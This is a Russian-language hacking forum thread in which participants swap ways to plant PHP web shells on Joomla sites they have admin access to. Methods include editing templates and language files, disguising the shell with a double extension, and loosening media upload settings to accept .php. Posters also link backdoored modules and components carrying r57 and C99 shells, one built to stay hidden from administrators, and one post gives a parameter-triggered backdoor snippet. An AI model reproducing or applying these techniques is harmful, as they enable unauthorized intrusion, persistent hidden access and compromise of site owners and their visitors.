![]() |
Заливка шелла в Joomla
У меня такой вопрос:
Пытаюсь подлить шелл в Joomla с помошью JoomlaXplorer, и пищет что сейчас стоит режим фаил типа нужно переключится в в ftp режим: Current mode: file. You could switch to ftp mode. естествено фтп ака я не знаю, какие еще есть способы заливки шелла в Joomla? |
через редактирование шаблонов, через заливку медиа файлов, через заливку _своего_ компонента/темы/мамбота с шеллом, через заливку картинки с шеллом и последующим инклудом (если прокатит)
https://forum.antichat.ru/thread39801.html ЗЫ для заливки компонента/темы/мамбота надо составлять xml файл, чтоб его нормально обработала джумла. берёшь его из любого компонента/темы/мамбота и редактируешь под свои нужды |
Пасибо, но через медия файлы там же фильтр стоит на расширения, а где ставить допустимые расширения я не нашол(на бразильском все(португальском), без инглиша), и инклюдов нету для картинки.
Ладно буду пробывать через стили или шаблоны. Пасибо еще раз. |
лей через JoomXplorer в папку images. Просто на ту папку куда ты льешь не хватает прав!
|
Как?
Current mode: file. You could switch to ftp mode. Я вообше ни чего не лил просто пытался запустить JoomXplorer. Права есть на всех дирах 0777. |
wmv файлы заливаются? заливай шелл с расширением .php.wmv
А вобще в джумле я всегда через шаблоны заливал |
Инклюдов нету, че мне потом с ним делать?
|
Вот тебе способ (как раз сегодня так шелл залил + только что на локалке проверил еще разок (на новой версии)):
заходишь в админку Language Manager выбираешь файл который будешь редактировать, к примеру English, щелка по нему попадаешь в менюшку с редактированием в ней есть путь до файла, к примеру: z:/home/test1.ru/www/language/english.php он тебе пригодится, точнее его часть, теперь сам файл, там может быть защита от выполнения без инклуда (если защиты нет то просто дописываем пару строчек): PHP код:
PHP код:
http://test1.ru/language/english.php?a=1 И получаем шелл: http://test1.ru/language/shell.php P.S. можно конечно впихнуть шелл и в редактируемый файл - но палевно будет смотреться, а так залил шелл, вернул все обратно и все гуд. |
архивчик http://slil.ru/25824397
это мой модуль шелл устанавливать как обычный модуль http://localhost/joomla/administrator/index2.php?option=com_installer&element=module шелл будет тут http://localhost/joomla/modules/mod_j_news.php?module=joomla |
Блин, шелл я давно залил через шаблонны, и здесь отписался как раз перед поста Grey, но какая то редиска его удалила, но все равно сенск за помошь ВСЕМ.
|
Цитата:
XML setup file is not for a "component" я не супер-админ, просто админ. к language manager доступа нет. что еще замутить? |
Цитата:
>>XML setup file is not for a "component" ты пытался установить компонент а не модуль, тебе сюда administrator/index2.php?option=com_installer&element=module 1) mod_r.zip не распаковывай так и отправляй, для установки модуля на запись должны бать доступны паки media, administrator/modules, modules 2) установи компонент com_joomlaxplorer(http://slil.ru/25475840) это файловый менеджер, для установки компонента должны быть доступны на запись папки media, administrator/components, components, images/stories в двишках жомла или мамбо чтобы установить компонент или модуль они должны быть в архиве обычно zip в котором должен быть xml файл в котором и расписана вся установка ЗЫ. если не получится залить шелл пишы в личку |
chekist, ты походу сам не понимаешь что выкладываешь и о чем говоришь ...
это именно МОДУЛЬ, и устанавливать его как модуль нужно! и тогда все работает. Шелл там кстати r57. вот еще один вариант, как по мне так получше будет. - устанавливается как компонент - внутри C99madShell - доступен по адресу /components/com_articles/articles.php [COLOR=White-[/COLOR] с админки его не видно, соответственно НЕ удаляется http://rapidshare.com/files/92224104/com_articles.zip.html тут я чуть переделал все это дело, скрестил как говорится, для меньшей палевности ))) все то же самое, только доступен по адресу: /components/com_articles/articles.php?module=joomla так: /components/com_articles/articles.php он не заведется |
AciD_FreaK
>>это именно МОДУЛЬ, и устанавливать его как модуль нужно! и тогда все работает. Шелл там кстати r57. а я что написал, я выкладывал модуль и устанавливать его надо как модуль, находились умники которые не знали как его устанавливать увидив архив они начинали его распаковывать и чем тебе не нравится r57? |
народ!!! можно ли както подругому залить шел через админкуджомлы ?! А то когда пробуеш через редактирование языка или установки модуля требует Логин и Пароль к Ftp!!!
|
__https://forum.antichat.ru/showpost.php?p=593795&postcount=14
|
Цитата:
http://img300.imageshack.us/img300/2544/joomlamk4.jpg |
Все просто. Ты льешь старую компоненту в новую Joomla 1.5 . Лучше заливай шелл через шаблон.
В крайнем случае можешь включить плагин для поддержки старых компонентов. :) если не понял - стукни в ПМ, со скринами объясню :) |
Цитата:
if ($_GET['xek']=='ontechad'){ // r57 } www.site.com/language/english.php?xek=ontechad |
Цитата:
Желательно без заливки еще одного шелла. |
Есть админка. как залить шел если только в этих папках стоят права на запись ?
images/ Доступен для записи Каталог кешa /usr/home/***/www/www.*.ua/cache/ Доступен для записи media/ Доступен для записи На хосте стоит joomlaXplorer (1,6,2). через него не идет залить шел так как он хочет переключиться в фтп моде. Версия джумлы 1,0,13 |
Цитата:
-в админке идем в site->global configuration->system->media settings -добавляем в legal extensions (file types) тип файлов php -изменяем Restrict Uploads на No -изменяем Check MIME Types на No -добавляем в Legal Image Extensions тип файлов php -изменяем Enable Flash Uploader на No -применяем изменения конфигурации Apply -идем в site->media manager->upload file загружаем шелл,путь до него будет site.com/images/shell.php |
Всё проще, гораздо проще, первый же пост на ачате в уязвимостях по джумле дает ответ на этот вопрос, причем недавно проверено - самый тупой способо, в лоб, но 100% действенный:
Устанавливайте плагин JoomlaXplorer 2.0, льете шелл, удаляете JoomlaXplorer 2.0. Всё |
проблемка что нет прав на заливку ни в одну папку... :(
|
Цитата:
на локалке прокатило |
По сабжу:
есть доступ к админке жумла, файлы редактировать не дает, Установка нового компонента: media/ Недоступен для записи administrator/components/ Недоступен для записи components/ Недоступен для записи images/stories/ Недоступен для записи Установка новых модулей: media/ Недоступен для записи administrator/modules/ Недоступен для записи modules/ Недоступен для записи Установка новых мамботов: media/ Недоступен для записи language/ Недоступен для записи mambots/ Недоступен для записи mambots/content/ Недоступен для записи mambots/search/ Недоступен для записи mambots/system/ Недоступен для записи Установить новый язык сайта: media/ Недоступен для записи language/ Недоступен для записи Установить новый шаблон (админки): media/ Недоступен для записи administrator/templates/ Недоступен для записи templates/ Недоступен для записи images/stories/ Недоступен для записи Установить новый шаблон (сайта): media/ Недоступен для записи administrator/templates/ Недоступен для записи templates/ Недоступен для записи images/stories/ Недоступен для записи НО есть доступ к бд через пхпму админ (доступ только для данной бд). Можно ли чтонибудь сделать? P.s. версия жумлы Joomla! 1.0.12 |
маловероятно
если только что то с соседями мутить |
Можно через инсталл компонентов, грузишь СРАЗУ тупо шелл, прямо вот так: shell.php со своего винта. Будут в папке /media
Называться будут также, как у тебя на винте Хотя хз, как там у тебя, т.к. все запрещено на запись. МОжет в /tmp упадут |
Цитата:
версия joomla 1.5.9 или есть иной метод получить пароль? Заранее спасибо |
Итак, есть Joomla! 1.0.15 Stable
В ней: Цитата:
и Цитата:
Цитата:
|
| Время: 13:37 |